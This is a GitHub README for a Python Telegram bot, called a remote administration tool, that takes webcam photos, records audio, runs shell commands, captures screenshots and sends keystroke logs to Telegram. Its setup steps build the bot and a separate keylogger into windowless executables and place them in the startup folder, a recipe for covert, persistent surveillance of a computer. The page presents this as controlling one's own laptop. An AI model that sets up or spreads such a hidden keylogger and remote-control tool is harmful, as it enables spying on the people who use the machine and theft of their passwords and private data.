Skip to content

Empower your laptop remotely via Telegram. Capture webcam shots, record audio, execute commands, take screenshots, and receive key presses. πŸ’»

License

Notifications You must be signed in to change notification settings

mymadhavyadav07/Remote-Administration-Tool

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ€–πŸ’» Remote Administration Tool

Take command of your laptop remotely through Telegram with this cutting-edge bot!

Features β€’ Getting Started β€’ Usage β€’ Contributing β€’ License

Telegram Laptop Control Bot

🌐 Overview

Ever wished you could control your laptop from anywhere using just your Telegram app? Look no further! This telegram bot allows you to access and manage various functionalities of your laptop remotely, providing convenience and flexibility like never before. Whether it's capturing webcam snapshots, recording audio, executing shell commands, or even receiving key press logs, this bot has got you covered.

πŸš€ Getting Started

  1. Clone this repository:

    git clone https://github.com/your-username/telegram-laptop-control-bot.git
  2. Install Dependencies:

    pip install -r requirements.txt
  3. Create Telegram-Bot: reference

  4. Initialize variables in main.py:

    TOKEN = ""   # Initialize Telegram-Bot Token
    SHELL_DIR = r"absolute/path/to/shell/directory"   # Initialize Directory to execute shell commands
    DIRECTORY = r"absolute/path/to/output/directory"  # Initialize Output Directory
  5. Initialize variables in key-logger.py:

    log_dir = r"absolute/path/to/output/directory"   # Initialize Directory to store Key-Logs
  6. Convert main.py to .exe:

    pyinstaller main.py --onefile --noconsole
    
  7. Convert key-logger.py to .exe:

    pyinstaller key-logger.py --onefile --noconsole
    
  8. Move both executables to startup folder πŸ“₯

🌟 Features

  • Webcam Capture: Snap photos using your laptop's webcam.
  • Audio Recording: Capture crisp audio from your device's microphone.
  • Audio Playback: Stream audio files sent via Telegram.
  • Shell Commands: Execute commands directly on your laptop.
  • Screenshot Capture: Get instant screenshots on demand.
  • Key Press Logging: Receive keystrokes as text files on Telegram.

πŸ“ Usage

Simply interact with the bot using Telegram commands:

  • /start - Initialize the bot and access its features.
  • /help - Get list of available commands.

🀝 Contributing

Contributions are welcome! Feel free to open issues or submit pull requests to enhance this project.

πŸ“„ License

This project is licensed under the MIT License - see the LICENSE file for details.


Let's revolutionize how you interact with your laptop through Telegram! πŸ’¬πŸ”₯